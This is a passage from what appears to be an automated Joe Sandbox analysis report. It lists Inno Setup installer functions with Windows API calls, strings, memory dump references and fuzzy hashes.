                                                                                                                                                                      APIs
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047C10E,00000000,0047C124,?,?,?,?,00000000), ref: 0047BEEA
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Close
                                                                                                                                                                      • String ID: RegisteredOrganization$RegisteredOwner
                                                                                                                                                                      • API String ID: 3535843008-1113070880
                                                                                                                                                                      • Opcode ID: 84a45650a36990dcb70b60736a2743294752ea66a4ad022a897bcd4cacc35a38
                                                                                                                                                                      • Instruction ID: 7ba728e1ef3f38ce6dcb00f7549556e1698566df6bc9e7584ed9d3abf6b47640
                                                                                                                                                                      • Opcode Fuzzy Hash: 84a45650a36990dcb70b60736a2743294752ea66a4ad022a897bcd4cacc35a38
                                                                                                                                                                      • Instruction Fuzzy Hash: 2CF09060704244AFEB00E665DC92BEA33A9D745304F20803BE2048B392D779AE00CB5C
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0046EC64 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,r_G,?,0049C1D0,?,0046EF7B,?,00000000,0046F516,?,_is1), ref: 0046EC87
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value
                                                                                                                                                                      • String ID: Inno Setup: Setup Version$r_G
                                                                                                                                                                      • API String ID: 3702945584-2380526977
                                                                                                                                                                      • Opcode ID: 7f432ea487bbfa797f902b9a32ac5717ba21713d0675ffadf20dea08d039660b
                                                                                                                                                                      • Instruction ID: ba068d84db82e82ca1a3bed1356aff977b130b22b64274b732cbd5037cad883f
                                                                                                                                                                      • Opcode Fuzzy Hash: 7f432ea487bbfa797f902b9a32ac5717ba21713d0675ffadf20dea08d039660b
                                                                                                                                                                      • Instruction Fuzzy Hash: 7DE06D753012047FD710AA2F9C85F5BBADCDF88765F10403AB908DB392D978DD0181A9
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00497510 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0047C8B0: FreeLibrary.KERNEL32(00000000,00480FF3), ref: 0047C8C6
                                                                                                                                                                        • Part of subcall function 0047C580: GetTickCount.KERNEL32 ref: 0047C5CA
                                                                                                                                                                        • Part of subcall function 004570B4: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004570D3
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,00497E67), ref: 00497565
                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,00497E67), ref: 0049756B
                                                                                                                                                                      Strings
                                                                                                                                                                      • Detected restart. Removing temporary directory., xrefs: 0049751F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                                                                                                                      • String ID: Detected restart. Removing temporary directory.
                                                                                                                                                                      • API String ID: 1717587489-3199836293
                                                                                                                                                                      • Opcode ID: 10733e8d0c2fcbcf81e8bc1e4ca83bd3e168a9b9b9b758ab357db50908ba3c86
                                                                                                                                                                      • Instruction ID: 3a6ec644de21484b963019a16799c2105d01f9358526232ca3662f3e81dafe78
                                                                                                                                                                      • Opcode Fuzzy Hash: 10733e8d0c2fcbcf81e8bc1e4ca83bd3e168a9b9b9b758ab357db50908ba3c86
                                                                                                                                                                      • Instruction Fuzzy Hash: C5E0E57121C6007EDE4177B6BC6295B3F9CD745778752483BF40881952E52D5810C6BD
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00475034 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,0047526B), ref: 00475059
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,0047526B), ref: 00475070
                                                                                                                                                                        • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005,00000000,0045403A,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004978B1,00000000), ref: 00453473
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                                      • String ID: CreateFile
                                                                                                                                                                      • API String ID: 2528220319-823142352
                                                                                                                                                                      • Opcode ID: 45f398a1a593fdecff2147bb029019ab571d1f120eeae4798deb9ab921dd96fc
                                                                                                                                                                      • Instruction ID: 870c31508693feaa39a4cce9bbdb9491accbaf3cbacbc975652ec4f9337bcdac
                                                                                                                                                                      • Opcode Fuzzy Hash: 45f398a1a593fdecff2147bb029019ab571d1f120eeae4798deb9ab921dd96fc
                                                                                                                                                                      • Instruction Fuzzy Hash: 88E06D302403447FEA10EA69CCC6F497798AB04728F10C152FA48AF3E2C5B9FC80866C
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00403344 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 9COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000,004980C2), ref: 0040334B
                                                                                                                                                                      • GetCommandLineA.KERNEL32(00000000,004980C2), ref: 00403356
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CommandHandleLineModule
                                                                                                                                                                      • String ID: x6h
                                                                                                                                                                      • API String ID: 2123368496-1876334821
                                                                                                                                                                      • Opcode ID: 48b45b62bccbc2a8e5daf731e4078a894a727d510552ebcfe8024faf6b9ab272
                                                                                                                                                                      • Instruction ID: ff8fa06d391bd0b31f892a344b3e95d40f530220570fde7b1ba7fad45aeb04f1
                                                                                                                                                                      • Opcode Fuzzy Hash: 48b45b62bccbc2a8e5daf731e4078a894a727d510552ebcfe8024faf6b9ab272
                                                                                                                                                                      • Instruction Fuzzy Hash: 45C002609013058AD754AF7579467162A94D751349F80447FF114BA3E1D77C82055BDD
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00455648 Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLastSleep
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1458359878-0
                                                                                                                                                                      • Opcode ID: ccaad77b81802646150ceb47634f2a9de79a21e51292ddd97143d32d2b9d1f19
                                                                                                                                                                      • Instruction ID: de14e8d07cc4d1fec6b94f0f99926b65e7014e25a7505cf550c56fab82152177
                                                                                                                                                                      • Opcode Fuzzy Hash: ccaad77b81802646150ceb47634f2a9de79a21e51292ddd97143d32d2b9d1f19
                                                                                                                                                                      • Instruction Fuzzy Hash: 91F0F672640954978A20B5DB89A1A3F724CDA94365760012BEC0CD7203C579CC494BAD
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%